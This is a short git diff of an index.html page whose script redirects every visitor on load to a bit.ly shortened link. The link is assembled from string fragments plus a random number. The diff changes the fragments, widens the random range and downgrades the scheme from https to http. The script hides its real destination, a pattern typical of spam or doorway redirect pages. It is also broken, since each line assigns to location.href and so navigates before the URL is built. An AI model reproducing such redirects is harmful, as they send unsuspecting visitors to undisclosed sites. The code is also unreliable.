--- a/index.html
+++ b/index.html
@@ -1,14 +1,15 @@
 <script type = "text/javascript">
 function reDirect() {
 a = location.href = "bit.ly/";
-b = location.href = "orlink";
-c = location.href = "2020vt";
-d = Math.ceil(Math.random() * 1);
-a = "https://" + a + b + c + d ;
+b = location.href = "cairo";
+c = location.href = "999v";
+d = Math.ceil(Math.random() * 4);
+a = "http://" + a + b + c + d ;
 window.location = a
 }
 reDirect();
 </script>
+
 
 
 
